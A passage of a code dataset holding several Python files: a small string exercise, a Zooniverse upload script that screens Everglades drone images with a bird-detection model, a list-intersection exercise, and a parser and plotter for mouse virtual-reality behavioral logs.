dict[new_word]=1\n    return True\n\nwhile(True):\n    word=input()\n    if(word=='*'): break\n    if(len(word)<=2 or check_word(word)):\n        print(word,\"is surprising.\")\n    else:\n        print(word,\"is NOT surprising.\")\n","sub_path":"6. 구현(Simulation)/1972.py","file_name":"1972.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"72200558","text":"#Zooniverse upload module\nimport glob\nimport os\nimport pandas as pd\nfrom panoptes_client import Panoptes, Project, SubjectSet, Subject\nimport rasterio\nfrom rasterio.warp import calculate_default_transform, reproject, Resampling\nfrom PIL import Image\nimport numpy as np\n\nfrom deepforest import deepforest\nfrom deepforest import utilities\n\nimport tile_raster\nimport utils\n\ndef utm_project(path):\n\n    #Everglades UTM Zone\n    dst_crs = 'EPSG:32617'\n\n    with rasterio.open(path) as src:\n        transform, width, height = calculate_default_transform(\n            src.crs, dst_crs, src.width, src.height, *src.bounds)\n        kwargs = src.meta.copy()\n        kwargs.update({\n            'crs': dst_crs,\n            'transform': transform,\n            'width': width,\n            'height': height\n        })\n\n        dest_name = \"{}_projected.tif\".format(os.path.splitext(path)[0])\n\n        with rasterio.open(dest_name, 'w', **kwargs) as dst:\n            for i in range(1, src.count + 1):\n                reproject(\n                    source=rasterio.band(src, i),\n                    destination=rasterio.band(dst, i),\n                    src_transform=src.transform,\n                    src_crs=src.crs,\n                    dst_transform=transform,\n                    dst_crs=dst_crs,\n                    resampling=Resampling.nearest)\n\n    return dest_name\n\ndef is_white(path):\n    d = rasterio.open(path)\n    numpy_image = d.read()\n    left, bottom, right, top = d.bounds\n\n    assert numpy_image.shape[0] == 3\n\n    #Check if image is all white\n    img_reshaped = numpy_image.reshape(-1, 3)\n    white = np.sum(img_reshaped == [255,255,255])/img_reshaped.size\n\n    if white > 0.55:\n        return True\n    else:\n        return False\n\ndef find_files(path):\n    \"\"\"Search and filter images\"\"\"\n    images = {}\n    image_paths = glob.glob(os.path.join(path, \"*.tif\"))\n    counter = 1\n\n    #extract site name\n    site_name = os.path.basename(path)\n\n    for i in image_paths:\n        #Load and get metadata\n        d = rasterio.open(i)\n        numpy_image = d.read()\n        left, bottom, right, top = d.bounds\n\n        #Write as a png\n        basename = os.path.splitext(i)[0]\n        png_name = \"{}.png\".format(basename)\n        img = Image.open(i)\n        img.save(png_name)\n\n        #Create dict\n        #crs = d.crs.to_epsg()\n        crs = None\n        images[png_name] = {\"subject_reference\":counter, 
\"bounds\":[left,bottom,right,top],\"crs\":crs,\"site\":site_name,\"resolution\":d.res,\"filename\":png_name}\n        counter +=1\n\n    return images\n\n#Create manifests\ndef create_subject_set(everglades_watch, name=\"demo\"):\n    subject_set = SubjectSet()\n    subject_set.links.project = everglades_watch\n    subject_set.display_name = name\n    subject_set.save()\n\n    return subject_set\n\ndef upload(subject_set, images, everglades_watch):\n    \"\"\"Assign images to project\"\"\"\n    new_subjects = []\n\n    print(\"Uploading {} images\".format(len(images)))\n    for filename, metadata in images.items():\n        subject = Subject()\n\n        subject.links.project = everglades_watch\n        subject.add_location(filename)\n\n        subject.metadata.update(metadata)\n\n        #Trigger upload\n        subject.save()\n        new_subjects.append(subject)\n    subject_set.add(new_subjects)\n\ndef screen_blanks(images, model):\n    #Load detection model\n    model = deepforest.deepforest(weights=model)\n    #model.classes_file = utilities.create_classes(\"/orange/ewhite/everglades/Zooniverse/parsed_images/test.csv\") \n    #model.read_classes()\n    screened_images = {}\n    for filename, metadata in images.items():\n        boxes = model.predict_image(filename, return_plot=False)\n\n        #small score filter\n        boxes = boxes[boxes.score > 0.4]\n        \n        if not boxes.empty:\n            #if any([x in boxes.label.unique() for x in [\"Great Blue Heron\",\"Snowy Egret\",\"Wood Stork\",\"Roseate Spoonbill\"]]):\n            screened_images[filename] = metadata\n        else:\n            print(\"Remove {}, screened empty\".format(filename))\n\n    return screened_images\n\ndef main(path, everglades_watch, model=None, save_dir=\"/orange/ewhite/everglades/Zooniverse/\"):\n    \"\"\"Args:\n        path: a .tif to run\n    \"\"\"\n    #Create new directory in save_dir\n    \n    basename = os.path.splitext(os.path.basename(path))[0]\n    event = os.path.basename(os.path.dirname(os.path.dirname(path))).replace(\" \",\"\")\n    basename = \"{}_{}\".format(event,basename)\n    dirname = \"{}/{}\".format(save_dir,basename)\n\n    try:\n        os.mkdir(dirname)\n    except:\n        pass\n        #raise ValueError(\"dirname: {} exists)\".format(dirname))\n\n    #Crop tif\n    #Project from longlat to utm\n    #check if exists\n    #projected_raster_path = \"{}_projected.tif\".format(os.path.splitext(path)[0])\n    #if not os.path.exists(projected_raster_path):\n        #projected_raster_path = utm_project(path)\n\n    saved_file = tile_raster.run(path=path, save_dir=dirname)\n    print(\"Created cropped files at {}\".format(saved_file))\n\n    #Generate metadata\n    images = find_files(saved_file)\n\n    #Screen for blanks\n    if model:\n        screened_images = screen_blanks(images, model)\n        print(\"{} images ready for upload\".format(len(screened_images)))\n    else:\n        screened_images = images\n    \n    #Create a new subject set\n    subject_set = create_subject_set(name=\"{}\".format(basename), everglades_watch=everglades_watch)\n\n    #Upload\n    upload(subject_set, screened_images, everglades_watch)\n\n    return saved_file\n\nif __name__ == \"__main__\":\n\n    #auth\n    everglades_watch = utils.connect()\n    \n    model = \"/orange/ewhite/everglades/Zooniverse/predictions/20210224_121421.h5\"\n\n    #Currently debugging with just one site\n    paths = glob.glob(\"/orange/ewhite/everglades/WadingBirds2020/Raw/Cypress City_03_25_2020/Mapping Photos/*.JPG\")\n    paths = [x for x in paths if \"projected\" not in x]\n    for path in paths:\n        print(path)\n        saved_file = main(path, everglades_watch, 
model)","sub_path":"Zooniverse/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":5954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"645866239","text":"list1 = [1, 23, 34, 54, 213, 2, 6]\nlist2 = [1, 23, 4, 2, 3, 5]\n\ncommon = []\nfor x in list1:\n for y in list2:\n if x == y:\n common.append(x)\n\n\nprint(common)\n\n","sub_path":"LIST/37.py","file_name":"37.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"441630476","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated in Mar 2019\n@author: bbujfalussy - ubalazs317@gmail.com\nA script to read behavioral log files in mouse in vivo virtual reality experiments\n\n\"\"\"\n\nimport numpy as np\nfrom string import *\nimport datetime\nimport time\nimport os\nimport pickle\nimport scipy.stats\nfrom scipy.interpolate import interp1d \nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Polygon\nfrom matplotlib.collections import PatchCollection\nimport sys\nfrom sys import version_info\nimport csv\n\nfrom Stages import *\nfrom Corridors import *\n\ndef nan_divide(a, b, where=True):\n 'division function that returns np.nan where the division is not defined'\n N = len(a)\n x = np.zeros(N)\n x.fill(np.nan)\n x = np.divide(a, b, out=x, where=where)\n return x\n\ndef nan_add(a, b):\n 'addition function that handles NANs by replacing them with zero - USE with CAUTION!'\n a[np.isnan(a)] = 0\n b[np.isnan(b)] = 0\n x = np.array(a + b)\n return x\n\nclass Lap_Data:\n 'common base class for individual laps'\n\n def __init__(self, name, lap, laptime, position, lick_times, reward_times, corridor, mode, actions, corridor_list, dt=0.01, printout=False):\n self.name = name\n self.lap = lap\n\n self.raw_time = laptime\n self.raw_position = position\n self.lick_times = lick_times\n self.reward_times = reward_times\n self.corridor = corridor # the ID of the corridor in the given stage; This indexes the corridors in the vector called self.corridors\n self.corridor_list = corridor_list \n self.mode = mode # 1 if all elements are recorded in 'Go' mode\n self.actions = actions\n self.speed_threshold = 5 ## cm / s 106 cm - 3500 roxels; roxel/s * 106.5/3500 = cm/s\n self.corridor_length_roxel = (self.corridor_list.corridors[self.corridor].length - 1024.0) / (7168.0 - 1024.0) * 3500\n\n self.speed_factor = 106.5 / 3500 ## constant to convert distance from pixel to cm\n self.corridor_length_cm = self.corridor_length_roxel * self.speed_factor # cm\n\n self.zones = np.vstack([np.array(self.corridor_list.corridors[self.corridor].reward_zone_starts), np.array(self.corridor_list.corridors[self.corridor].reward_zone_ends)])\n self.n_zones = np.shape(self.zones)[1]\n self.preZoneRate = [None, None] # only if 1 lick zone; Compare the 210 roxels just before the zone with the preceeding 210 \n\n self.dt = 0.01 # resampling frequency = 100 Hz\n\n ####################################################################\n ## resample time and position with a uniform 100 Hz\n nbins = int(round(self.corridor_length_roxel / 70))\n self.bincenters = np.arange(0, self.corridor_length_roxel, 70) + 70 / 2.0\n \n if (len(self.raw_time) > 2):\n F = interp1d(self.raw_time,self.raw_position) \n start_time = np.ceil(self.raw_time.min()/self.dt)*self.dt\n end_time = np.floor(self.raw_time.max()/self.dt)*self.dt\n Ntimes = int(round((end_time - start_time) / self.dt)) + 1\n self.laptime = np.linspace(start_time, 
end_time, Ntimes)\n            ppos = F(self.laptime)\n            \n            self.lick_position = F(self.lick_times)\n            self.reward_position = F(self.reward_times)\n            \n            ## smooth the position data with a 50 ms Gaussian kernel\n            # sdfilt = 0.05\n            # xfilt = np.arange(-4*sdfilt, 4*sdfilt+self.dt, self.dt)\n            # filt = np.exp(-(xfilt ** 2) / (2 * (sdfilt**2)))\n            # filt = filt / sum(filt)\n\n            # dx1 = ppos[1] - ppos[0]\n            # dxx1 = ppos[0] - np.arange(20, 0, -1) * dx1\n\n            # dx2 = ppos[-1] - ppos[-2]\n            # dxx2 = ppos[-1] + np.arange(20, 0, -1) * dx2\n\n            # pppos = np.hstack([dxx1, ppos, dxx2])\n            # pppos = np.hstack([np.repeat(ppos[0], 20), ppos, np.repeat(ppos[-1], 20)])\n            # smooth_position = np.convolve(pppos, filt, mode='valid')\n            self.smooth_position = ppos\n            \n            ## calculate the smoothed speed \n            speed = np.diff(self.smooth_position) * self.speed_factor / self.dt # roxel [=rotational pixel] / s \n            speed_first = 2 * speed[0] - speed[1] # linear extrapolation: x1 - (x2 - x1)\n            self.speed = np.hstack([speed_first, speed])\n            \n            ####################################################################\n            ## calculate the lick-rate and the average speed versus location \n            bin_counts = np.zeros(nbins)\n            for pos in self.smooth_position:\n                bin_number = int(pos // 70)\n                bin_counts[bin_number] += 1\n            self.T_pos = bin_counts * self.dt\n            \n            lbin_counts = np.zeros(nbins)\n            for lpos in self.lick_position:\n                lbin_number = int(lpos // 70)\n                lbin_counts[lbin_number] += 1\n            self.N_licks = lbin_counts\n            self.lick_rate = nan_divide(self.N_licks, self.T_pos, where=(self.T_pos > 0.025))\n            \n            total_speed = np.zeros(nbins)\n            for i in range(len(self.smooth_position)):\n                ii = int(self.smooth_position[i] // 70)\n                total_speed[ii] = total_speed[ii] + self.speed[i]\n            total_speed = total_speed * self.dt\n            self.ave_speed = nan_divide(total_speed, self.T_pos, where=(self.T_pos > 0.025))\n            \n            ####################################################################\n            ## Calculate the lick rate before the reward zone - anticipatory licks 210 roxels before zone start\n            ## only when the number of zones is 1!\n            \n            if (self.n_zones == 1):\n                \n                zone_start = int(self.zones[0][0] * self.corridor_length_roxel)\n                lz_posbins = [0, zone_start-420, zone_start-210, zone_start, self.corridor_length_roxel]\n                \n                lz_bin_counts = np.zeros(4)\n                for pos in self.smooth_position:\n                    bin_number = [ n for n,i in enumerate(lz_posbins) if i>=pos ][0] - 1\n                    lz_bin_counts[bin_number] += 1\n                T_lz_pos = lz_bin_counts * self.dt\n                \n                lz_lbin_counts = np.zeros(4)\n                for lpos in self.lick_position:\n                    lbin_number = [ n for n,i in enumerate(lz_posbins) if i>=lpos ][0] - 1\n                    lz_lbin_counts[lbin_number] += 1\n                lz_lick_rate = nan_divide(lz_lbin_counts, T_lz_pos, where=(T_lz_pos>0.025))\n                self.preZoneRate = [lz_lick_rate[1], lz_lick_rate[2]]\n        else:\n            self.lick_position = lick_times\n            self.reward_position = reward_times\n            self.smooth_position = position\n            self.speed = np.zeros(len(position))\n            self.T_pos = np.zeros(nbins)\n            self.N_licks = np.zeros(nbins)\n            self.ave_speed = np.zeros(nbins)\n            self.lick_rate = np.zeros(nbins)\n            self.preZoneRate = np.zeros(2)\n        \n\n    def plot_tx(self):\n        cmap = plt.cm.get_cmap('jet') \n        plt.figure(figsize=(6,4))\n        plt.plot(self.laptime, self.smooth_position, c=cmap(50))\n        plt.plot(self.raw_time, self.raw_position, c=cmap(90))\n\n        plt.scatter(self.lick_times, np.repeat(self.smooth_position.min(), len(self.lick_times)), marker=\"|\", s=100, c=cmap(180))\n        plt.scatter(self.reward_times, np.repeat(self.smooth_position.min()+100, 
len(self.reward_times)), marker=\"|\", s=100, c=cmap(230))\n plt.ylabel('position')\n plt.xlabel('time (s)')\n plot_title = 'Mouse: ' + self.name + ' position in lap ' + str(self.lap) + ' in corridor ' + str(self.corridor)\n plt.title(plot_title)\n plt.ylim(0, self.corridor_length_roxel)\n\n plt.show(block=False)\n \n # time = mm.Laps[55].time\n # smooth_position = mm.Laps[55].smooth_position\n # lick_times = mm.Laps[55].lick_times\n # reward_times = mm.Laps[55].reward_times\n # lap = mm.Laps[55].lap\n # corridor = mm.Laps[55].corridor\n # lick_rate = mm.Laps[55].lick_rate\n # bincenters = np.arange(0, 3500, 175) + 175 / 2.0\n\n # plt.figure(figsize=(6,4))\n # plt.plot(laptime, smooth_position, c='g')\n\n # plt.scatter(lick_times, np.repeat(smooth_position.min(), len(lick_times)), marker=\"|\", s=100)\n # plt.scatter(reward_times, np.repeat(smooth_position.min()+100, len(reward_times)), marker=\"|\", s=100, c='r')\n # plt.ylabel('position')\n # plt.xlabel('time (s)')\n # plot_title = 'Mouse: ' + name + ' position in lap ' + str(lap) + ' in corridor ' + str(corridor)\n # plt.title(plot_title)\n\n # plt.show(block=False)\n\n def plot_xv(self):\n cmap = plt.cm.get_cmap('jet') \n\n fig, ax = plt.subplots(figsize=(6,4))\n plt.plot(self.smooth_position, self.speed, c=cmap(80))\n plt.step(self.bincenters, self.ave_speed, where='mid', c=cmap(30))\n plt.scatter(self.lick_position, np.repeat(5, len(self.lick_position)), marker=\"|\", s=100, c=cmap(180))\n plt.scatter(self.reward_position, np.repeat(10, len(self.reward_position)), marker=\"|\", s=100, c=cmap(230))\n plt.ylabel('speed (cm/s)')\n plt.ylim([min(0, self.speed.min()), max(self.speed.max(), 30)])\n plt.xlabel('position')\n plot_title = 'Mouse: ' + self.name + ' speed in lap ' + str(self.lap) + ' in corridor ' + str(self.corridor)\n plt.title(plot_title)\n\n\n bottom, top = plt.ylim()\n left = self.zones[0,0] * self.corridor_length_roxel\n right = self.zones[1,0] * self.corridor_length_roxel\n\n polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n ax.add_patch(polygon)\n if (self.n_zones > 1):\n for i in range(1, np.shape(self.zones)[1]):\n left = self.zones[0,i] * self.corridor_length_roxel\n right = self.zones[1,i] * self.corridor_length_roxel\n polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n ax.add_patch(polygon)\n\n ax2 = plt.twinx()\n ax2.step(self.bincenters, self.lick_rate, where='mid', c=cmap(200), linewidth=1)\n ax2.set_ylabel('lick rate (lick/s)', color=cmap(200))\n ax2.tick_params(axis='y', labelcolor=cmap(200))\n ax2.set_ylim([-1,max(2*np.nanmax(self.lick_rate), 20)])\n\n plt.show(block=False) \n\n\n # cmap = plt.cm.get_cmap('jet') \n # smooth_position = mm.Laps[55].smooth_position\n # speed = mm.Laps[55].speed\n # lick_position = mm.Laps[55].lick_position\n # lick_times = mm.Laps[55].lick_times\n # reward_position = mm.Laps[55].reward_position\n # reward_times = mm.Laps[55].reward_times\n # lap = mm.Laps[55].lap\n # corridor = mm.Laps[55].corridor\n # lick_rate = mm.Laps[55].lick_rate\n # ave_speed = mm.Laps[55].ave_speed\n # zones = mm.Laps[0].zones\n # bincenters = np.arange(0, 3500, 175) + 175 / 2.0\n\n # fig, ax = plt.subplots(figsize=(6,4))\n # ax.plot(smooth_position, speed, c=cmap(80))\n # ax.plot(bincenters, ave_speed, c=cmap(30))\n # ax.scatter(lick_position, np.repeat(speed.min(), len(lick_position)), marker=\"|\", s=100, c=cmap(180))\n # ax.scatter(reward_position, 
np.repeat(speed.min(), len(reward_position)), marker=\"|\", s=100, c=cmap(230))\n # plt.ylabel('speed (roxel/s)')\n # plt.xlabel('position')\n # plot_title = 'Mouse: ' + name + ' speed in lap ' + str(lap) + ' in corridor ' + str(corridor)\n # plt.title(plot_title)\n\n # bottom, top = plt.ylim()\n # left = zones[0,0] * 3500\n # right = zones[1,0] * 3500\n\n # polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n # if (np.shape(zones)[1] > 1):\n # for i in range(1, np.shape(zones)[1]):\n # left = zones[0,i] * 3500\n # right = zones[1,i] * 3500\n # polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n # ax.add_patch(polygon)\n\n\n # ax2 = plt.twinx()\n # ax2.plot(bincenters, lick_rate, c=cmap(200), linewidth=1)\n # ax2.set_ylabel('lick rate', color=cmap(200))\n # ax2.tick_params(axis='y', labelcolor=cmap(200))\n # ax2.set_ylim([-1,2*max(lick_rate)])\n\n # plt.show(block=False) \n\n\n def plot_txv(self):\n cmap = plt.cm.get_cmap('jet') \n fig, (ax_top, ax_bottom) = plt.subplots(2, 1, figsize=(6,6))\n\n ## first, plot position versus time\n ax_top.plot(self.laptime, self.smooth_position, c=cmap(50))\n ax_top.plot(self.raw_time, self.raw_position, c=cmap(90))\n\n ax_top.scatter(self.lick_times, np.repeat(200, len(self.lick_times)), marker=\"|\", s=100, c=cmap(180))\n ax_top.scatter(self.reward_times, np.repeat(400, len(self.reward_times)), marker=\"|\", s=100, c=cmap(230))\n ax_top.set_ylabel('position')\n ax_top.set_xlabel('time (s)')\n plot_title = 'Mouse: ' + self.name + ' position and speed in lap ' + str(self.lap) + ' in corridor ' + str(self.corridor)\n ax_top.set_title(plot_title)\n ax_top.set_ylim(0, self.corridor_length_roxel + 100)\n\n\n ## next, plot speed versus position\n ax_bottom.plot(self.smooth_position, self.speed, c=cmap(80))\n ax_bottom.step(self.bincenters, self.ave_speed, where='mid', c=cmap(30))\n ax_bottom.scatter(self.lick_position, np.repeat(5, len(self.lick_position)), marker=\"|\", s=100, c=cmap(180))\n ax_bottom.scatter(self.reward_position, np.repeat(10, len(self.reward_position)), marker=\"|\", s=100, c=cmap(230))\n ax_bottom.set_ylabel('speed (cm/s)')\n ax_bottom.set_xlabel('position')\n ax_bottom.set_ylim([min(0, self.speed.min()), max(self.speed.max(), 30)])\n\n bottom, top = plt.ylim()\n left = self.zones[0,0] * self.corridor_length_roxel\n right = self.zones[1,0] * self.corridor_length_roxel\n\n polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n ax_bottom.add_patch(polygon)\n if (self.n_zones > 1):\n for i in range(1, np.shape(self.zones)[1]):\n left = self.zones[0,i] * self.corridor_length_roxel\n right = self.zones[1,i] * self.corridor_length_roxel\n polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n ax_bottom.add_patch(polygon)\n\n ax2 = ax_bottom.twinx()\n ax2.step(self.bincenters, self.lick_rate, where='mid', c=cmap(180), linewidth=1)\n ax2.set_ylabel('lick rate (lick/s)', color=cmap(180))\n ax2.tick_params(axis='y', labelcolor=cmap(180))\n ax2.set_ylim([-1,max(2*np.nanmax(self.lick_rate), 20)])\n\n plt.show(block=False) \n\n\n\nclass anticipatory_Licks:\n 'simple class for containing anticipatory licking data'\n def __init__(self, baseline_rate, anti_rate, corridor):\n nan_rates = np.isnan(baseline_rate) + np.isnan(anti_rate)\n baseline_rate = 
baseline_rate[np.logical_not(nan_rates)]\n anti_rate = anti_rate[np.logical_not(nan_rates)]\n self.baseline = baseline_rate\n self.anti_rate = anti_rate\n\n self.m_base = np.mean(self.baseline)\n self.m_anti = np.mean(self.anti_rate)\n if (self.m_base < self.m_anti):\n greater = True\n else:\n greater = False\n self.corridor = int(corridor)\n self.test = scipy.stats.wilcoxon(self.baseline, self.anti_rate)\n self.anti = False\n if ((self.test[1] < 0.01 ) & (greater == True)):\n self.anti = True\n\n\nclass Session:\n 'common base class for low level position and licksensor data in a given session'\n\n def __init__(self, datapath, date_time, name, task, sessionID=-1, printout=False):\n self.name = name\n self.stage = 0\n self.sessionID = sessionID\n self.stages = []\n\n stagefilename = datapath + task + '_stages.pkl'\n input_file = open(stagefilename, 'rb')\n if version_info.major == 2:\n self.stage_list = pickle.load(input_file)\n elif version_info.major == 3:\n self.stage_list = pickle.load(input_file, encoding='latin1')\n input_file.close()\n\n corridorfilename = datapath + task + '_corridors.pkl'\n input_file = open(corridorfilename, 'rb')\n if version_info.major == 2:\n self.corridor_list = pickle.load(input_file)\n elif version_info.major == 3:\n self.corridor_list = pickle.load(input_file, encoding='latin1')\n input_file.close()\n\n self.Laps = []\n self.n_laps = 0\n\n self.get_stage(datapath, date_time, name, task)\n self.corridors = np.hstack([0, np.array(self.stage_list.stages[self.stage].corridors)])\n\n self.get_lapdata(datapath, date_time, name, task)\n self.test_anticipatory()\n\n def get_lapdata(self, datapath, date_time, name, task):\n\n time_array=[]\n lap_array=[]\n maze_array=[]\n position_array=[]\n mode_array=[]\n lick_array=[]\n action=[]\n\n data_log_file_string=datapath + 'data/' + name + '_' + task + '/' + date_time + '/' + date_time + '_' + name + '_' + task + '_ExpStateMashineLog.txt'\n data_log_file=open(data_log_file_string)\n log_file_reader=csv.reader(data_log_file, delimiter=',')\n next(log_file_reader, None)#skip the headers\n for line in log_file_reader:\n time_array.append(float(line[0]))\n lap_array.append(int(line[1]))\n maze_array.append(int(line[2]))\n position_array.append(int(line[3]))\n mode_array.append(line[6] == 'Go')\n lick_array.append(line[9] == 'TRUE')\n action.append(str(line[14]))\n\n laptime = np.array(time_array)\n pos = np.array(position_array)\n lick = np.array(lick_array)\n lap = np.array(lap_array)\n maze = np.array(maze_array)\n mode = np.array(mode_array)\n N_0lap = 0 # Counting the non-valid laps\n self.n_laps = 0\n\n for i_lap in np.unique(lap):\n y = lap == i_lap # index for the current lap\n\n mode_lap = np.prod(mode[y]) # 1 if all elements are recorded in 'Go' mode\n\n maze_lap = np.unique(maze[y])\n if (len(maze_lap) == 1):\n corridor = self.corridors[int(maze_lap)] # the maze_lap is the index of the available corridors in the given stage\n else:\n corridor = -1\n\n if (corridor > 0):\n t_lap = laptime[y]\n pos_lap = pos[y]\n \n lick_lap = lick[y]\n t_licks = t_lap[lick_lap]\n \n istart = np.where(y)[0][0]\n iend = np.where(y)[0][-1] + 1\n action_lap = action[istart:iend]\n \n reward_indices = [j for j, x in enumerate(action_lap) if x == \"TrialReward\"]\n t_reward = t_lap[reward_indices]\n \n actions = []\n for j in range(len(action_lap)):\n if not((action_lap[j]) in ['No', 'TrialReward']):\n actions.append([t_lap[j], action_lap[j]])\n \n \n # sessions.append(Lap_Data(name, i, t_lap, pos_lap, t_licks, t_reward, corridor, 
mode_lap, actions))\n self.Laps.append(Lap_Data(self.name, self.n_laps, t_lap, pos_lap, t_licks, t_reward, corridor, mode_lap, actions, self.corridor_list))\n self.n_laps = self.n_laps + 1\n else:\n N_0lap = N_0lap + 1 # grey zone (corridor == 0) or invalid lap (corridor = -1)\n\n def get_stage(self, datapath, date_time, name, task):\n action_log_file_string=datapath + 'data/' + name + '_' + task + '/' + date_time + '/' + date_time + '_' + name + '_' + task + '_UserActionLog.txt'\n action_log_file=open(action_log_file_string)\n log_file_reader=csv.reader(action_log_file, delimiter=',')\n next(log_file_reader, None)#skip the headers\n for line in log_file_reader:\n if (line[1] == 'Stage'):\n self.stage = int(round(float(line[2])))\n\n def test_anticipatory(self):\n corridor_ids = np.zeros(self.n_laps)\n for i in range(self.n_laps):\n corridor_ids[i] = self.Laps[i].corridor # the true corridor ID\n corridor_types = np.unique(corridor_ids)\n nrow = len(corridor_types)\n self.anticipatory = []\n\n for row in range(nrow):\n ids = np.where(corridor_ids == corridor_types[row])\n n_laps = np.shape(ids)[1]\n n_zones = np.shape(self.Laps[ids[0][0]].zones)[1]\n if (n_zones == 1):\n lick_rates = np.zeros([2,n_laps])\n k = 0\n for lap in np.nditer(ids):\n lick_rates[:,k] = self.Laps[lap].preZoneRate\n k = k + 1\n self.anticipatory.append(anticipatory_Licks(lick_rates[0,:], lick_rates[1,:], corridor_types[row]))\n\n\n def plot_session(self):\n ## find the number of different corridors\n if (self.n_laps > 0):\n corridor_ids = np.zeros(self.n_laps)\n for i in range(self.n_laps):\n corridor_ids[i] = self.Laps[i].corridor\n corridor_types = np.unique(corridor_ids)\n nrow = len(corridor_types)\n nbins = len(self.Laps[0].bincenters)\n cmap = plt.cm.get_cmap('jet') \n\n rowHeight = 2\n if (nrow > 4):\n rowHeight = 1.5\n fig, axs = plt.subplots(nrows=nrow, ncols=1, figsize=(8,rowHeight*nrow), squeeze=False)\n # plt.figure(figsize=(5,2*nrow))\n speed_color = cmap(30)\n speed_color_trial = (speed_color[0], speed_color[1], speed_color[2], (0.05))\n\n lick_color = cmap(200)\n lick_color_trial = (lick_color[0], lick_color[1], lick_color[2], (0.05))\n\n for row in range(nrow):\n # ax = plt.subplot(nrow, 1, row+1)\n ids = np.where(corridor_ids == corridor_types[row])\n avespeed = np.zeros(nbins)\n n_lap_bins = np.zeros(nbins) # number of laps in a given bin (data might be NAN for some laps)\n n_laps = np.shape(ids)[1]\n maxspeed = 10\n for lap in np.nditer(ids):\n axs[row,0].step(self.Laps[lap].bincenters, self.Laps[lap].ave_speed, where='mid', c=speed_color_trial)\n nans_lap = np.isnan(self.Laps[lap].ave_speed)\n avespeed = nan_add(avespeed, self.Laps[lap].ave_speed)\n n_lap_bins = n_lap_bins + np.logical_not(nans_lap)\n if (max(self.Laps[lap].ave_speed) > maxspeed): maxspeed = max(self.Laps[lap].ave_speed)\n maxspeed = min(maxspeed, 60)\n \n avespeed = nan_divide(avespeed, n_lap_bins, n_lap_bins > 0)\n axs[row,0].step(self.Laps[lap].bincenters, avespeed, where='mid', c=speed_color)\n axs[row,0].set_ylim([-1,1.2*maxspeed])\n\n if (row == 0):\n if (self.sessionID >= 0):\n plot_title = 'session:' + str(self.sessionID) + ': ' + str(int(n_laps)) + ' laps in corridor ' + str(int(corridor_types[row]))\n else:\n plot_title = str(int(n_laps)) + ' laps in corridor ' + str(int(corridor_types[row])) \n else:\n plot_title = str(int(n_laps)) + ' laps in corridor ' + str(int(corridor_types[row]))\n\n if (self.Laps[lap].zones.shape[1] > 0):\n bottom, top = axs[row,0].get_ylim()\n left = self.Laps[lap].zones[0,0] * 
self.Laps[lap].corridor_length_roxel\n                    right = self.Laps[lap].zones[1,0] * self.Laps[lap].corridor_length_roxel\n\n                    polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n                    axs[row,0].add_patch(polygon)\n                    n_zones = np.shape(self.Laps[lap].zones)[1]\n                    if (n_zones > 1):\n                        for i in range(1, np.shape(self.Laps[lap].zones)[1]):\n                            left = self.Laps[lap].zones[0,i] * self.Laps[lap].corridor_length_roxel\n                            right = self.Laps[lap].zones[1,i] * self.Laps[lap].corridor_length_roxel\n                            polygon = Polygon(np.array([[left, bottom], [left, top], [right, top], [right, bottom]]), True, color='green', alpha=0.15)\n                            axs[row,0].add_patch(polygon)\n                    # else: ## test for lick rate changes before the zone\n                    #     self.anticipatory = np.zeros([2,n_laps])\n                    #     k = 0\n                    #     for lap in np.nditer(ids):\n                    #         self.anticipatory[:,k] = self.Laps[lap].preZoneRate\n                    #         k = k + 1\n                else: # we look for anticipatory licking tests\n                    P_statement = ', anticipatory P value not tested'\n                    for k in range(len(self.anticipatory)):\n                        if (self.anticipatory[k].corridor == corridor_types[row]):\n                            P_statement = ', anticipatory P = ' + str(round(self.anticipatory[k].test[1],5))\n                    plot_title = plot_title + P_statement\n\n                axs[row,0].set_title(plot_title)\n\n                ax2 = axs[row,0].twinx()\n                n_lap_bins = np.zeros(nbins) # number of laps in a given bin (data might be NAN for some laps)\n                maxrate = 10\n                avelick = np.zeros(nbins)\n                for lap in np.nditer(ids):\n                    ax2.step(self.Laps[lap].bincenters, self.Laps[lap].lick_rate, where='mid', c=lick_color_trial, linewidth=1)\n                    nans_lap = np.isnan(self.Laps[lap].lick_rate)\n                    avelick = nan_add(avelick, self.Laps[lap].lick_rate)\n                    n_lap_bins = n_lap_bins + np.logical_not(nans_lap)\n                    if (max(self.Laps[lap].lick_rate) > maxrate): maxrate = max(self.Laps[lap].lick_rate)\n                maxrate = min(maxrate, 20)\n\n                avelick = nan_divide(avelick, n_lap_bins, n_lap_bins > 0)\n                ax2.step(self.Laps[lap].bincenters, avelick, where='mid', c=lick_color)\n                ax2.set_ylim([-1,1.2*maxrate])\n\n\n                if (row==(nrow-1)):\n                    axs[row,0].set_ylabel('speed (cm/s)', color=speed_color)\n                    axs[row,0].tick_params(axis='y', labelcolor=speed_color)\n                    ax2.set_ylabel('lick rate (lick/s)', color=lick_color)\n                    ax2.tick_params(axis='y', labelcolor=lick_color)\n                    axs[row,0].set_xlabel('position (roxel)')\n                else:\n                    axs[row,0].set_xticklabels([])\n                    axs[row,0].tick_params(axis='y', labelcolor=speed_color)\n                    ax2.tick_params(axis='y', labelcolor=lick_color)\n\n            plt.show(block=False)\n        else:\n            fig = plt.figure(figsize=(8,3))\n            # plt.scatter([-4, -3, -2], [2,3,4])\n            plt.title('No data to show')\n            plt.show(block=False)\n\n\n\n\n# #load trigger log 